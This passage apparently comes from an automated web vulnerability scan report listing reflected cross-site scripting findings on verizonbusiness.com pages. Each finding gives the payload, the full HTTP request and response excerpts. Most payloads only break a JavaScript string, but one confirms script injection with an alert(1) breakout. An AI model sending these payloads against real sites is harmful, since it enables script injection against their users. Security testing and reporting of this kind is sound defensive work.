This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media42c67'%3b24e3ecd4da4/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:42 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources/media42c67';24e3ecd4da4/index-131046-wifi+shopping+borders.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1140. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e439"%3b61de4f4386a was submitted in the REST URL parameter 3. This input was echoed as 5e439";61de4f4386a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media5e439"%3b61de4f4386a/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources/media5e439";61de4f4386a/index-131046-wifi+shopping+borders.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MI
...[SNIP]...

1.1141. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d7dd</script><script>alert(1)</script>001464c44cd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media/index-131046-wifi+shopping+borders.xml4d7dd</script><script>alert(1)</script>001464c44cd HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "e82b5580bcccf7c9d14a452f89a90d93"
Last-Modified: Wed, 17 Nov 2010 01:02:05 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 01:02:05 GMT
Content-Length: 21366
Connection: close
Set-Cookie: BERT=VRID%3d4477ad6b-1eb2-4d30-b29d-415b503ffda3|VTID%3d5efb350f-943f-451a-9dc6-bc8d057cd59b|SX%3d1289956925|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:05:49 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 19:02:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/worldwide/resources/media/index-131046-wifi+shopping+borders.xml4d7dd</script><script>alert(1)</script>001464c44cd</url>
...[SNIP]...

1.1142. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3d63"%3ba3f3085eb7c was submitted in the REST URL parameter 1. This input was echoed as b3d63";a3f3085eb7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwideb3d63"%3ba3f3085eb7c/resources/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwideb3d63";a3f3085eb7c/resources/media/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.1143. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17d46'%3b465f1de14ef was submitted in the REST URL parameter 1. This input was echoed as 17d46';465f1de14ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide17d46'%3b465f1de14ef/resources/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:25 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide17d46';465f1de14ef/resources/media/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1144. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36a93'%3b822ce9279c7 was submitted in the REST URL parameter 2. This input was echoed as 36a93';822ce9279c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources36a93'%3b822ce9279c7/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:47 GMT
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources36a93';822ce9279c7/media/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1145. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7d73"%3b949b3becdb0 was submitted in the REST URL parameter 2. This input was echoed as f7d73";949b3becdb0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resourcesf7d73"%3b949b3becdb0/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:35 GMT
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resourcesf7d73";949b3becdb0/media/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.1146. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dba5c'%3bdfc24057dbd was submitted in the REST URL parameter 3. This input was echoed as dba5c';dfc24057dbd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/mediadba5c'%3bdfc24057dbd/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:02:07 GMT
Content-Type: text/html
Content-Length: 40260
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:02:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:02:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources/mediadba5c';dfc24057dbd/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1147. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fb44"%3bb0fafe33ee7 was submitted in the REST URL parameter 3. This input was echoed as 5fb44";b0fafe33ee7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media5fb44"%3bb0fafe33ee7/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40260
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources/media5fb44";b0fafe33ee7/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1148. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ce8e"%3bc126e288bfe was submitted in the REST URL parameter 4. This input was echoed as 6ce8e";c126e288bfe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media/index.xml6ce8e"%3bc126e288bfe?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:02:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 38203
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:02:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:02:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
x.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources/media/index.xml6ce8e";c126e288bfe";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1149. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d961'%3be3115deb0d2 was submitted in the REST URL parameter 4. This input was echoed as 9d961';e3115deb0d2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media/index.xml9d961'%3be3115deb0d2?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:02:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 38203
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:02:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:02:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources/media/index.xml9d961';e3115deb0d2'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1150. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49945'%3b21ef45edbfb was submitted in the REST URL parameter 1. This input was echoed as 49945';21ef45edbfb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide49945'%3b21ef45edbfb/resources/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide49945';21ef45edbfb/resources/media/large-131421-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1151. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8d7e"%3bde47903cbee was submitted in the REST URL parameter 1. This input was echoed as f8d7e";de47903cbee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwidef8d7e"%3bde47903cbee/resources/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
